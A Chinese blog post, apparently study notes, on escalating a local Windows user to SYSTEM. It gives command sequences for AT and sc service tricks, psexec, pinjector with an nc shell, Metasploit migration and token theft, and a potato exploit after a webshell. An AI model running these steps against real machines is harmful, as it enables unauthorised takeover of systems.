首页 > 系统相关 >Windows本地用户提权(一)

Windows本地用户提权(一)

时间:2023-03-18 15:47:48浏览次数:39  
标签:exe Windows cmd 本地用户 提权 msf 服务器 权限

本地用户提权

AT命令提权(适用于sever 2003及win7以前)

普通用户在cmd中输入 at 时间 /interactive cmd

到时间后会弹出新的cmd窗口,该窗口的用户权限是system

SC命令提权(适用于sever 2003及以前)

#创建一个名叫syscmd的新的交互式的cmd执行服务

sc Create syscmdabc binPath= "cmd /K start" type= own type= interact

#运行服务

sc start syscmdabc

PStools提权(适用于sever 2008,sever 2012等,部分个人主机不能执行)

下载PStools,再将其中的psexec.exe上传到服务器

然后在服务器cmd窗口执行:

psexec.exe -accepteula -s -i -d cmd 

生成的新的cmd窗口权限为system

进程迁移注入提权(适用于servee 2008以前版本)

下载并安装pinjector.exe到服务器

查看本地运行的进程及权限

pinjector -l

将该进程的权限绑定到本地的一个端口上

pinjector -p 420 cmd 3333

新开一个cmd,使用nc监听本地的该端口:

nc 192.168.46.149 3333

此时的权限为system

msf进程迁移提权(Win2008&2012&2016-阿里云服务器)

服务器执行msf后门,在msf上线后:

ps //查看进程及权限
migrate PID //迁移对应PID

注意:权限太低无法执行。

令牌窃取提权(Win2008 Win2012 阿里云服务器)

use incognito

list_tokens -u \\查看当前令牌信息

impersonate_token "NT AUTHORITY\SYSTEM(权限信息)"

获取webshell后,过低权限用户利用烂土豆先提权,再令牌窃取

服务器中有potato.exe,在msf中执行:

execute -cH -f ./potato.exe (当前路径下有potato.exe)

再令牌窃取:

use incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"

msf自动提权

getsystem

标签:exe,Windows,cmd,本地用户,提权,msf,服务器,权限
From: https://www.cnblogs.com/arongsec/p/17230875.html

相关文章